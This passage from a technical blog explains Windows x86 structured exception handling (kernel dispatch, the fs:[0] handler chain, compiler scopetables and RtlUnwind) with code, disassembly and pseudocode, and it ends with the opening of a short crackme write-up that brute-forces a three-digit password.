<p>PreviousMode是一个枚举类型,表示触发异常的代码的执行模式是用户模式还是内核模式。FirstChance参数表示是否是第一轮分发这个异常。对于一个异常,Windows系统最多会分发两轮。图2画出了KiDispatchException分发异常的基本过程。</p>
<p><img src="/assets/img/exception/2.png" alt="" /></p>
<p>这里我们只关注用户态异常并且调试器没有处理该异常的情况。KiDispatchException将CONTEXT和EXCEPTION_RECORD结构复制到用户态栈中,之后将内核变量KeUserExceptionDispatcher的值赋给KTRAP_FRAME中的Eip,这个值就是KiUserExceptionDispatcher函数的地址。之后执行iret指令返回用户空间。我们在windbg中看到:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dd KeUserExceptionDispatcher
8055b310 7c92e47c 7c92e460 7c92e450 0002625a
8055b320 00000000 00000000 00000000 00000000
</code></pre></div></div>
<p>可以看到KeUserExceptionDispatcher的值为0x7c92e47c,这与OD看到的吻合。</p>
<p>回到用户态后,KiUserExceptionDispatcher会通过调用RtlDispatchException来寻找异常处理器。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> KiUserExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext )
{
DWORD retValue;
// Note: If the exception is handled, RtlDispatchException() never returns
if ( RtlDispatchException( pExceptRec, pContext ) )
retValue = NtContinue( pContext, 0 );
else
retValue = NtRaiseException( pExceptRec, pContext, 0 );
EXCEPTION_RECORD excptRec2;
excptRec2.ExceptionCode = retValue;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
RtlRaiseException( &excptRec2 );
}
</code></pre></div></div>
<p>RtlDispatchException's job is to find the head node of the exception handler list registered in the Thread Information Block (TIB) and then visit each node in turn, calling its handler function, until either someone handles the exception or the end of the list is reached. This is where the SEH mechanism comes into play.</p>
<h3 id="第二节">2. The OS-provided SEH mechanism</h3>
<p>RtlDispatchException invokes the exception handler functions registered by user code. The prototype of this callback is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EXCEPTION_DISPOSITION
__cdecl _except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);
</code></pre></div></div>
<p>Among these parameters, ExceptionRecord and ContextRecord are the structures copied from kernel mode onto the user-mode stack; EstablisherFrame is the stack frame of the function that established (registered) the exception handler; DispatcherContext is a pointer that is only meaningful for the temporary protection node used during nested exceptions.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef enum _EXCEPTION_DISPOSITION {
ExceptionContinueExecution,
ExceptionContinueSearch,
ExceptionNestedException,
ExceptionCollidedUnwind
} EXCEPTION_DISPOSITION;
</code></pre></div></div>
<p>The OS decides what to do next based on the handler's return value.</p>
<p>This already touches on the compiler's SEH support, but let me describe the OS mechanism first. As mentioned above, RtlDispatchException finds the head node of the exception handler list through the TIB, via fs:[0]: fs always points to the current thread's TEB, and the TIB sits at the very beginning of the TEB. Let's look at the TIB structure first:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_NT_TIB
+0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 StackBase : Ptr32 Void
+0x008 StackLimit : Ptr32 Void
+0x00c SubSystemTib : Ptr32 Void
+0x010 FiberData : Ptr32 Void
+0x010 Version : Uint4B
+0x014 ArbitraryUserPointer : Ptr32 Void
+0x018 Self : Ptr32 _NT_TIB
</code></pre></div></div>
<p>We can see that the first field is a pointer to an _EXCEPTION_REGISTRATION_RECORD:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_EXCEPTION_REGISTRATION_RECORD
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Handler : Ptr32 _EXCEPTION_DISPOSITION
</code></pre></div></div>
<p>The first member is the address of the next _EXCEPTION_REGISTRATION_RECORD structure; the second is an exception handler function.</p>
<p>To summarize briefly, the steps for executing a user-registered exception handler are as follows. When an exception occurs and control returns to user mode, RtlDispatchException looks for user-registered handlers by first reading the ExceptionList field via fs:[0], then walking the list until it finds an EXCEPTION_REGISTRATION structure whose callback (the exception handler) agrees to handle the exception. In the MYSEH.CPP example, the handler signals this by returning ExceptionContinueExecution. A callback may also decline to handle the exception; in that case the system moves to the next EXCEPTION_REGISTRATION structure in the list and asks its callback whether it is willing to handle the exception. Figure 3 shows this process.</p>
<p><img src="/assets/img/exception/3.png" alt="" /></p>
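<p>The search loop that RtlDispatchException runs over this chain can be modeled in a few lines of Python — a simplified sketch of the mechanism only, not the real NT code, and the dictionary-based node layout is purely illustrative:</p>

```python
# Disposition values returned by a handler (simplified):
ExceptionContinueExecution = 0  # handler fixed things; resume at the fault
ExceptionContinueSearch = 1     # handler declined; ask the next node

def dispatch_exception(head, record, context):
    """Walk the EXCEPTION_REGISTRATION chain that starts at fs:[0]."""
    node = head
    while node is not None:  # the real chain is terminated by 0xFFFFFFFF
        disposition = node['handler'](record, node, context)
        if disposition != ExceptionContinueSearch:
            return disposition  # this node agreed to handle the exception
        node = node['next']     # otherwise move to the next registration
    return None  # nobody handled it: second-chance processing follows
```

<p>A handler that returns ExceptionContinueExecution stops the walk, which is exactly what the MYSEH example below does.</p>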
<p>Here is an example that registers and unregisters an exception handler by hand.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include "stdafx.h"
//==================================================
// MYSEH - Matt Pietrek 1997
// Microsoft Systems Journal, January 1997
// FILE: MYSEH.CPP
// To compile: CL MYSEH.CPP
//==================================================
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
DWORD scratch;
EXCEPTION_DISPOSITION
__cdecl
_except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext )
{
unsigned i;
// Indicate that we made it to our exception handler
printf( "Hello from an exception handler\n" );
// Change EAX in the context record so that it points to someplace
// where we can successfully write
ContextRecord->Eax = (DWORD)&scratch;
// Tell the OS to restart the faulting instruction
return ExceptionContinueExecution;
}
int main()
{
DWORD handler = (DWORD)_except_handler;
__asm
{
// Build an EXCEPTION_REGISTRATION structure:
push handler // address of the handler function
push FS:[0] // address of the previous EXCEPTION_REGISTRATION
mov FS:[0],ESP // install the new EXCEPTION_REGISTRATION structure
}
__asm
{
mov eax,0 // zero EAX
mov [eax], 1 // write to the memory EAX points to, deliberately faulting
}
printf( "After writing!\n" );
__asm
{
// Remove our EXCEPTION_REGISTRATION record
mov eax,[ESP] // get the previous structure
mov FS:[0], EAX // install the previous structure
add esp, 8 // pop the EXCEPTION_REGISTRATION off the stack
}
return 0;
}
</code></pre></div></div>
<p>The code needs little explanation: we manually push a handler and then trigger an exception; control enters our handler, and after it handles the fault, execution resumes in the original flow.</p>
<p>What we just saw is the operating system's support for SEH, presented to explain the basic principles of registering and unregistering SEH handlers. Obviously, writing Windows programs this way would be painful: first, you would have to write a handler matching the SehHandler prototype; second, you would have to manipulate the stack pointer directly. Normally we just write __try{} __except(){} and the handler registration happens automatically — that is the compiler's SEH support.</p>
<h3 id="第三节">3. Compiler-level SEH</h3>
<p>Let's look at compiler-level SEH through an example; the sample program can be downloaded here: <a href="/assets/file/exception/sehtes.cpp">sehtes.cpp</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1 119: int main()
2 120: {
3 00401280 push ebp
4 00401281 mov ebp,esp
5 00401283 push 0FFh
6 00401285 push offset string "Caught Exception in main\n"+24h (00422130)
7 0040128A push offset __except_handler3 (00401430)
8 0040128F mov eax,fs:[00000000]
9 00401295 push eax
10 00401296 mov dword ptr fs:[0],esp
11 0040129D add esp,0B4h
12 004012A0 push ebx
13 004012A1 push esi
14 004012A2 push edi
15 004012A3 mov dword ptr [ebp-18h],esp
16 004012A6 lea edi,[ebp-5Ch]
17 004012A9 mov ecx,11h
18 004012AE mov eax,0CCCCCCCCh
19 004012B3 rep stos dword ptr [edi]
20 121: int i;
21 122: // two non-nested __try blocks, which makes the compiler emit two scopetable entries
22 123: __try
23 004012B5 mov dword ptr [ebp-4],0
24 124: {
25 125: i = 0x1234;
26 004012BC mov dword ptr [ebp-1Ch],1234h
27 126:
28 127: } __except( EXCEPTION_EXECUTE_HANDLER )
29 004012C3 mov dword ptr [ebp-4],0FFFFFFFFh
30 004012CA jmp $L17074+17h (004012e9)
31 $L17073:
32 004012CC mov eax,1
33 $L17075:
34 004012D1 ret
35 $L17074:
36 004012D2 mov esp,dword ptr [ebp-18h]
37 128: {
38 129: printf("div0 occur!\n");
39 004012D5 push offset string "div0 occur!\n" (004230c4)
40 004012DA call printf (00401370)
41 004012DF add esp,4
42 130: }
43 004012E2 mov dword ptr [ebp-4],0FFFFFFFFh
44 131: __try
45 004012E9 mov dword ptr [ebp-4],1
46 132: {
47 133: Function1(); // call a function that sets up more exception frames
48 004012F0 call @ILT+15(Function1) (00401014)
49 134: } __except( EXCEPTION_EXECUTE_HANDLER )
50 004012F5 mov dword ptr [ebp-4],0FFFFFFFFh
51 004012FC jmp $L17078+17h (0040131b)
52 $L17077:
53 004012FE mov eax,1
54 $L17079:
55 00401303 ret
56 $L17078:
57 00401304 mov esp,dword ptr [ebp-18h]
58 135: {
59 136: // should never get here, since we never intend to raise any exception
60 137: printf( "Caught Exception in main\n" );
61 00401307 push offset string "Caught Exception in main\n" (0042210c)
62 0040130C call printf (00401370)
63 00401311 add esp,4
64 138: }
65 00401314 mov dword ptr [ebp-4],0FFFFFFFFh
66 139: return 0;
67 0040131B xor eax,eax
68 140: }
69 0040131D mov ecx,dword ptr [ebp-10h]
70 00401320 mov dword ptr fs:[0],ecx
71 00401327 pop edi
72 00401328 pop esi
73 00401329 pop ebx
74 0040132A add esp,5Ch
75 0040132D cmp ebp,esp
76 0040132F call __chkesp (004013f0)
77 00401334 mov esp,ebp
78 00401336 pop ebp
79 00401337 ret
80
81
82 99: void Function1( void )
83 100: {
84 004011A0 push ebp
85 004011A1 mov ebp,esp
86 004011A3 push 0FFh
87 004011A5 push offset string "_except_handler3 is at address: "...+30h (004220e0)
88 004011AA push offset __except_handler3 (00401430)
89 004011AF mov eax,fs:[00000000]
90 004011B5 push eax
91 004011B6 mov dword ptr fs:[0],esp
92 004011BD add esp,0B4h
93 004011C0 push ebx
94 004011C1 push esi
95 004011C2 push edi
96 004011C3 mov dword ptr [ebp-18h],esp
97 004011C6 lea edi,[ebp-5Ch]
98 004011C9 mov ecx,11h
99 004011CE mov eax,0CCCCCCCCh
100 004011D3 rep stos dword ptr [edi]
101 101: int i;
102 102: // nest 3 __try blocks to force 3 elements in the scopetable array
103 103: __try
104 004011D5 mov dword ptr [ebp-4],0
105 104: {
106 105: __try
107 004011DC mov dword ptr [ebp-4],1
108 106: {
109 107: __try
110 004011E3 mov dword ptr [ebp-4],2
111 108: {
112 109: i = i/0;
113 004011EA mov eax,dword ptr [ebp-1Ch]
114 004011ED cdq
115 0
</code></pre></div></div>
<p>Lines 5–10 register the exception handler, somewhat differently from our hand-written version.</p>
<p>First, __except_handler3 is used as the exception handler. When compiling __try{}__except structures, the compiler always registers one common function as the exception handler instead of generating a separate handler for every piece of code that uses SEH. Different compilers use different handler functions; here it is __except_handler3 from the VC6 compiler. The handler is invoked by the system's exception dispatch chain — RtlDispatchException -&gt; ExecuteHandler -&gt; ExecuteHandler2 -&gt; __except_handler3 — and the number of parameters is fixed. This means new parameters cannot simply be added; the only option is to extend the existing ones, using a cast to turn a simple type into a richer type containing extended fields. That is exactly the approach VC takes, which brings us to the second difference.</p>
<p>Second, before setting up the EXCEPTION_REGISTRATION_RECORD on the stack (lines 7–9), the compiler-generated code first pushes an integer known as trylevel (line 5) and a scopetable pointer to a scopetable_entry structure (line 6), so that the stack actually holds the following _EXCEPTION_REGISTRATION structure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct _EXCEPTION_REGISTRATION{
struct _EXCEPTION_REGISTRATION *prev;
void (*handler)(PEXCEPTION_RECORD,PEXCEPTION_REGISTRATION,PCONTEXT,PEXCEPTION_RECORD);
struct scopetable_entry *scopetable;
int trylevel;
int _ebp;
}
</code></pre></div></div>
<p>The fields are described below.</p>
<p>1. scopetable</p>
<p>This pointer refers to an array whose elements are scopetable_entry structures, each describing one __try{}__except construct.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct scopetable_entry
{
DWORD previousTryLevel;
FARPROC lpfnFilter;
FARPROC lpfnHandler;
}
</code></pre></div></div>
<p>lpfnFilter and lpfnHandler hold the start addresses of the filter expression and the exception-handling block of a __try{}__except construct. Looking again at the example above:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00422130 FF FF FF FF CC 12 40 00 D2 12 40 00 FF FF FF FF ......@...@.....
00422140 FE 12 40 00 04 13 40 00
</code></pre></div></div>
<p>Each function registers one _EXCEPTION_REGISTRATION, and each try/except corresponds to one element of the scopetable.
In this example, main has two trys, hence two elements: the first FFFFFFFF means that try is not nested inside any __try structure, 004012CC is the filter function of the first __try, and 004012D2 is the handler of the first __try.</p>
<p>2. trylevel</p>
<p>trylevel is an index into the scopetable. At the very start of main it is -1, meaning we are not inside any try construct. On entering the first try it is set to 0 (line 23), meaning that if an exception occurs we should look at the first scopetable element; after leaving the first try it is set back to -1 (line 43).</p>
<p>To better understand scopetable and trylevel, let's examine Function1 more closely; its scopetable is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>004220E0 FF FF FF FF 2F 12 40 00 32 12 40 00 00 00 00 00 ..../[email protected].@.....
004220F0 19 12 40 00 1C 12 40 00 01 00 00 00 03 12 40 00 ..@...@.......@.
00422100 06 12 40 00
</code></pre></div></div>
<p>This scopetable has three elements. The first has a previousTryLevel of -1, meaning it is not nested in any try block; the second has a previousTryLevel of 0, meaning it sits inside scopetable element 0; the third is similar. In lines 104–110 we can see trylevel being set each time a try block is entered.</p>
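<p>The walk along previousTryLevel can be sketched in Python — an illustration of the search order only; the field names follow the structures above, while everything else is invented for the demo:</p>

```python
TRYLEVEL_NONE = -1

def find_handler(scopetable, trylevel, filter_of):
    """Model __except_handler3's search: evaluate the filter of each
    enclosing __try, following previousTryLevel outward."""
    while trylevel != TRYLEVEL_NONE:
        entry = scopetable[trylevel]
        if filter_of(trylevel) == 'EXCEPTION_EXECUTE_HANDLER':
            return entry['lpfnHandler']       # this __except block will run
        trylevel = entry['previousTryLevel']  # step out one nesting level
    return None  # ExceptionContinueSearch: move on to the next frame

# Function1's three nested __try blocks, mirroring the dump above:
scopetable = [
    {'previousTryLevel': -1, 'lpfnHandler': 'handler0'},
    {'previousTryLevel': 0,  'lpfnHandler': 'handler1'},
    {'previousTryLevel': 1,  'lpfnHandler': 'handler2'},
]
```

<p>Starting from the innermost trylevel (2), the search visits entries 2, 1, 0 in that order and stops at the first filter that accepts.</p>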
<p>Let's look at pseudocode for __except_handler3 first and then summarize how it runs:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __except_handler3(
struct _EXCEPTION_RECORD * pExceptionRecord,
struct EXCEPTION_REGISTRATION * pRegistrationFrame,
struct _CONTEXT *pContextRecord,
void * pDispatcherContext )
{
LONG filterFuncRet;
LONG trylevel;
EXCEPTION_POINTERS exceptPtrs;
PSCOPETABLE pScopeTable;
CLD // clear the direction flag (no condition is tested!)
// If neither the EXCEPTION_UNWINDING flag nor the EXCEPTION_EXIT_UNWIND flag
// is set, this is the first call to this handler (i.e., not the unwind phase)
if ( ! (pExceptionRecord->ExceptionFlags
& (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND)) )
{
// Build an EXCEPTION_POINTERS structure on the stack
exceptPtrs.ExceptionRecord = pExceptionRecord;
exceptPtrs.ContextRecord = pContextRecord;
// Place the address of the EXCEPTION_POINTERS structure defined above
// 4 bytes below the establisher frame; compare the assembly the compiler
// generates for GetExceptionInformation
*(PDWORD)((PBYTE)pRegistrationFrame - 4) = &exceptPtrs;
// Fetch the initial "trylevel" value
trylevel = pRegistrationFrame->trylevel;
// Fetch the pointer to the scopetable array
scopeTable = pRegistrationFrame->scopetable;
search_for_handler:
if ( pRegistrationFrame->trylevel != TRYLEVEL_NONE )
{
if ( pRegistrationFrame->scopetable[trylevel].lpfnFilter )
{
PUSH EBP // save this frame pointer
// !!!Very important!!! Switch back to the original EBP. This is what
// keeps all the locals in the frame valid after the exception occurs.
EBP = &pRegistrationFrame->_ebp;
// Invoke the filter function
filterFuncRet = scopetable[trylevel].lpfnFilter();
POP EBP // restore the exception handler's frame pointer
if ( filterFuncRet != EXCEPTION_CONTINUE_SEARCH )
{
if ( filterFuncRet < 0 ) // EXCEPTION_CONTINUE_EXECUTION
return ExceptionContinueExecution;
// If we get here, the return value was EXCEPTION_EXECUTE_HANDLER
scopetable = pRegistrationFrame->scopetable;
// Let the OS clean up the registered frames; this recursively re-enters this function
__global_unwind2( pRegistrationFrame );
// Once we get here, every frame except the last one has been
// cleaned up, and execution continues from that last frame
EBP = &pRegistrationFrame->_ebp;
__local_unwind2( pRegistrationFrame, trylevel );
// NLG = "non-local-goto" (setjmp/longjmp stuff)
__NLG_Notify( 1 ); // EAX = scopetable->lpfnHandler
// Set the current trylevel to the previousTryLevel of the SCOPETABLE
// element that was in use when the handler was found
pRegistrationFrame->trylevel = scopetable->previousTryLevel;
// Call the __except {} block; this call does not return
pRegistrationFrame->scopetable[trylevel].lpfnHandler();
}
}
scopeTable = pRegistrationFrame->scopetable;
trylevel = scopeTable->previousTryLevel;
goto search_for_handler;
}
else // trylevel == TRYLEVEL_NONE
{
return ExceptionContinueSearch;
}
}
else // the EXCEPTION_UNWINDING or EXCEPTION_EXIT_UNWIND flag is set
{
PUSH EBP // save EBP
EBP = &pRegistrationFrame->_ebp; // set up EBP for the call to __local_unwind2
__local_unwind2( pRegistrationFrame, TRYLEVEL_NONE )
POP EBP // restore EBP
return ExceptionContinueSearch;
}
}
</code></pre></div></div>
<p>__except_handler3 mainly performs the following steps:</p>
<p>1. Cast the second parameter, pRegistrationRecord, from the system's default EXCEPTION_REGISTRATION_RECORD structure to the _EXCEPTION_REGISTRATION structure containing the extended fields.</p>
<p>2. Read the trylevel field from pRegistrationRecord into a local variable nTrylevel, then use nTrylevel to select a scopetable_entry structure from the array referenced by the scopetable field.</p>
<p>3. Read the lpfnFilter field from the scopetable_entry; if it is non-NULL, call it — i.e., evaluate the filter expression. If it is NULL, go to step 5.</p>
<p>4. If lpfnFilter returns anything other than EXCEPTION_CONTINUE_SEARCH, prepare to execute the function specified by lpfnHandler, never returning. If the filter expression returns EXCEPTION_CONTINUE_SEARCH, fall through to step 5.</p>
<p>5. Check the previousTryLevel field of the scopetable_entry. If it is not -1, assign it to nTrylevel and loop back to step 2. If it is -1, continue to step 6.</p>
<p>6. Return DISPOSITION_CONTINUE_SEARCH so that the system (RtlDispatchException) keeps looking for other exception handlers.</p>
<p>How does __except_handler3 manage to call the __except block with a CALL instruction yet never have control return? Since CALL pushes a return address onto the stack, you might imagine this could corrupt the stack. If you examine the code the compiler generates for an __except block, you will find that the first thing it does is load into ESP the DWORD stored 8 bytes below the EXCEPTION_REGISTRATION structure (i.e., at [EBP-18H]; the actual instruction is MOV ESP,DWORD PTR [EBP-18H]). That value was saved there by the function's prolog (the actual instruction is MOV DWORD PTR [EBP-18H],ESP).</p>
<p>The process above omits global and local unwinding, which we discuss in the next section.</p>
<h3 id="第四节">4. Unwinding</h3>
<p>To explain this concept, we first need to review the processing flow after an exception occurs.</p>
<p>Assume a chain of function calls that all use SEH:
func1 -&gt; func2 -&gt; func3, and an exception is triggered while func3 is executing.</p>
<p>Look at the dispatch flow: RtlRaiseException -&gt; RtlDispatchException -&gt; RtlpExecuteHandlerForException.
RtlDispatchException walks the exception list and calls RtlpExecuteHandlerForException for each EXCEPTION_REGISTRATION.
RtlpExecuteHandlerForException calls EXCEPTION_REGISTRATION::handler — that is, __except_handler3. As analyzed above, that function walks EXCEPTION_REGISTRATION::scopetable, and if some scopetable_entry::lpfnFilter returns EXCEPTION_EXECUTE_HANDLER, the corresponding scopetable_entry::lpfnHandler is invoked to handle the exception.
Because lpfnHandler never returns to __except_handler3, once it finishes, execution simply continues from the code that follows it. So suppose func3 triggers an exception that is handled by an __except block in func1: after that __except block completes, execution continues from the instructions following it — in func1's code — and we never return to func2 or func3. This raises a question: what about the resources held by func2 and func3? Resources such as allocated memory are not released automatically; wouldn't this leak?</p>
<p>This is where "unwinding" comes in.
Put simply, unwinding means cleanup. (Note: the cleanup here mainly concerns dynamically allocated resources; the stack space itself is reclaimed in passing by func1's "mov esp,ebp"-style operations. The question of who cleans up the stack once puzzled me for a long time…)</p>
<p>So who performs this unwinding? Leaving it to func1 is clearly inappropriate: func1 has no way of knowing whether func2 and func3 acquired resources, or which ones. The unwinding therefore has to be done by func2 and func3 themselves.</p>
<p>Unwinding comes in two kinds: "global unwinding" and "local unwinding".
A global unwind targets a segment of the exception chain, while a local unwind targets one specific EXCEPTION_REGISTRATION. In the example above, a local unwind is the cleanup inside one function — func3 or func2 — and the global unwind is the sum of the local unwinds of func2 and func3. To generalize: a local unwind is the cleanup inside a specific function, and a global unwind is the sum of the local unwinds of every function between the point where the exception was raised (func3, inclusive) and the point where it is handled (func1).</p>
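<p>The "global unwind = sum of local unwinds" relationship can be sketched like this — a conceptual model only; the real work is done by RtlUnwind, whose pseudocode follows:</p>

```python
def global_unwind(chain, target):
    """Model RtlUnwind: run the local cleanup of every frame between the
    head of the registration chain and the handling frame (exclusive),
    unlinking each frame as we go."""
    cleaned = []
    while chain and chain[0] is not target:
        frame = chain.pop(0)     # RtlpUnlinkHandler: fs:[0] = frame->prev
        frame['local_unwind']()  # this frame's own cleanup (local unwind)
        cleaned.append(frame['name'])
    return cleaned

# func1 -> func2 -> func3: the exception raised in func3 is handled in func1,
# so the frames of func3 and func2 (in that order) are cleaned up first.
frames = [{'name': n, 'local_unwind': lambda: None}
          for n in ('func3', 'func2', 'func1')]
```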
<p>RtlUnwind is used to perform the unwind.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void _RtlUnwind( PEXCEPTION_REGISTRATION pRegistrationFrame,
PVOID returnAddr, // not used! (at least on i386 machines)
PEXCEPTION_RECORD pExcptRec,
DWORD _eax_value)
{
DWORD stackUserBase;
DWORD stackUserTop;
EXCEPTION_RECORD excptRec;
CONTEXT context;
// Get the stack limits from FS:[4] and FS:[8]
RtlpGetStackLimits( &stackUserBase, &stackUserTop );
if ( 0 == pExcptRec ) // the normal case
{
pExcptRec = &excptRec;
pExcptRec->ExceptionFlags = 0;
pExcptRec->ExceptionCode = STATUS_UNWIND;
pExcptRec->ExceptionRecord = 0;
pExcptRec->ExceptionAddress = [ebp+4]; // RtlpGetReturnAddress() — get the return address
pExcptRec->ExceptionInformation[0] = 0;
}
if ( pRegistrationFrame )
pExcptRec->ExceptionFlags |= EXCEPTION_UNWINDING;
else // together these two flags are defined as EXCEPTION_UNWIND_CONTEXT
pExcptRec->ExceptionFlags|=(EXCEPTION_UNWINDING|EXCEPTION_EXIT_UNWIND);
context.ContextFlags =( CONTEXT_i486 | CONTEXT_CONTROL |
CONTEXT_INTEGER | CONTEXT_SEGMENTS);
RtlpCaptureContext( &context );
context.Esp += 0x10;
context.Eax = _eax_value;
PEXCEPTION_REGISTRATION pExcptRegHead;
pExcptRegHead = RtlpGetRegistrationHead(); // returns the value of FS:[0]
// Begin walking the list of EXCEPTION_REGISTRATION structures
while ( -1 != pExcptRegHead )
{
EXCEPTION_RECORD excptRec2;
if ( pExcptRegHead == pRegistrationFrame )
{
NtContinue( &context, 0 );
}
else
{
// If some exception frame sits lower on the stack than the head
// of the exception list, something must have gone wrong
if ( pRegistrationFrame && (pRegistrationFrame <= pExcptRegHead) )
{
// Raise an exception
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_UNWIND_TARGET;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
}
PVOID pStack = pExcptRegHead + 8; // 8 = sizeof(EXCEPTION_REGISTRATION)
// Make sure pExcptRegHead is within the stack bounds and a multiple of 4
if ( (stackUserBase <= pExcptRegHead )
&& (stackUserTop >= pStack )
&& (0 == (pExcptRegHead & 3)) )
{
DWORD pNewRegistHead;
DWORD retValue;
retValue = RtlpExecuteHandlerForUnwind(pExcptRec, pExcptRegHead, &context,
&pNewRegistHead, pExcptRegHead->handler );
if ( retValue != DISPOSITION_CONTINUE_SEARCH )
{
if ( retValue != DISPOSITION_COLLIDED_UNWIND )
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_DISPOSITION;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
else
pExcptRegHead = pNewRegistHead;
}
PEXCEPTION_REGISTRATION pCurrExcptReg = pExcptRegHead;
pExcptRegHead = pExcptRegHead->prev;
RtlpUnlinkHandler( pCurrExcptReg );
}
else // the stack has been corrupted! raise an exception
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_BAD_STACK;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
}
// If we get here, we reached the end of the list of EXCEPTION_REGISTRATION
// structures, which should not normally happen (normally the exception
// should be handled, so we should never reach the end of the list)
if ( -1 == pRegistrationFrame )
NtContinue( &context, 0 );
else
NtRaiseException( pExcptRec, &context, 0 );
}
// The pseudocode for RtlUnwind ends here; below is pseudocode for the helper functions it calls:
PEXCEPTION_REGISTRATION RtlpGetRegistrationHead( void )
{
return FS:[0];
}
RtlpUnlinkHandler( PEXCEPTION_REGISTRATION pRegistrationFrame )
{
FS:[0] = pRegistrationFrame->prev;
}
void RtlpCaptureContext( CONTEXT * pContext )
{
pContext->Eax = 0;
pContext->Ecx = 0;
pContext->Edx = 0;
pContext->Ebx = 0;
pContext->Esi = 0;
pContext->Edi = 0;
pContext->SegCs = CS;
pContext->SegDs = DS;
pContext->SegEs = ES;
pContext->SegFs = FS;
pContext->SegGs = GS;
pContext->SegSs = SS;
pContext->EFlags = flags; // corresponding assembly: __asm{ PUSHFD / pop [xxxxxxxx] }
pContext->Eip = <return address of this function's caller's caller>; // look at this
pContext->Ebp = <EBP of this function's caller's caller>; // function's assembly and it's clear
pContext->Esp = pContext->Ebp + 8;
}
</code></pre></div></div>
<p>Although RtlUnwind looks large, it is not hard to understand once you break it apart. It first obtains the current thread's stack limits from FS:[4] and FS:[8]. These are essential for the validity checks performed later, which ensure that every exception frame about to be unwound lies within the stack.</p>
<p>RtlUnwind then builds an empty EXCEPTION_RECORD on the stack, assigning STATUS_UNWIND to its ExceptionCode field and the EXCEPTION_UNWINDING flag to its ExceptionFlags field. A pointer to this structure is passed as one of the parameters to every exception callback. The function then calls RtlpCaptureContext to create an empty CONTEXT structure, which also becomes one of the parameters passed to each exception callback during the unwind phase.</p>
<p>The rest of RtlUnwind walks the EXCEPTION_REGISTRATION list. For each frame it calls RtlpExecuteHandlerForUnwind, which invokes the exception callback with the EXCEPTION_UNWINDING flag set. The code of RtlpExecuteHandlerForException is extremely similar to that of RtlpExecuteHandlerForUnwind: both simply load a different value into EDX and then call ExecuteHandler. In other words, RtlpExecuteHandlerForException and RtlpExecuteHandlerForUnwind are both front ends to the common ExecuteHandler function.</p>
<p>ExecuteHandler fetches the handler field of the EXCEPTION_REGISTRATION structure and calls it. Curiously, the call to the exception callback is itself wrapped in a structured exception handler. Using SEH inside SEH itself may look odd, but after a moment's thought it makes sense: if another exception is raised during the callback, the operating system needs to know. Depending on whether the new exception occurred during the initial callback phase or the unwind callback phase, ExecuteHandler returns either DISPOSITION_NESTED_EXCEPTION or DISPOSITION_COLLIDED_UNWIND — both are "red alert! shut everything down now!" codes.
After each callback, it calls RtlpUnlinkHandler to remove the corresponding exception frame.</p>
<p>The first parameter of RtlUnwind is the address of a frame; unwinding stops when the walk reaches that frame. Interspersed through the code described above are safety checks to make sure nothing goes wrong. If anything does, RtlUnwind raises an exception describing the problem, marked with the EXCEPTION_NONCONTINUABLE flag; a process in which this flag has been raised may not continue running and must terminate.</p>
<p>References:</p>
<ol>
<li>
<p>A Crash Course on the Depths of Win32™ Structured Exception Handling</p>
</li>
<li>
<p>SEH分析笔记(X86篇)</p>
</li>
<li>
<p>《软件调试》 (Software Debugging), Zhang Yinkui</p>
</li>
<li>
<p>ReactOS source code</p>
</li>
<li>
<p>WRK source code</p>
</li>
</ol>
XDCSC2010破解题22014-03-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/25/xdcsc-04pojie
<p>The program can be downloaded here: <a href="/assets/file/xdcsc2010/04pojie.zip">04 crack</a>.
Dropping it into IDA, I was immediately horrified — with all that tedious back-and-forth arithmetic, who knows how long the analysis would take. The program's flow is actually very clear: it takes one argument, runs it through assorted computations, and compares the final result against</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1011010011110110
</code></pre></div></div>
<p>If they match it prints Yes, otherwise Sorry. Since the problem's readme says the password is a three-digit number, I simply enumerated 000–999.</p>
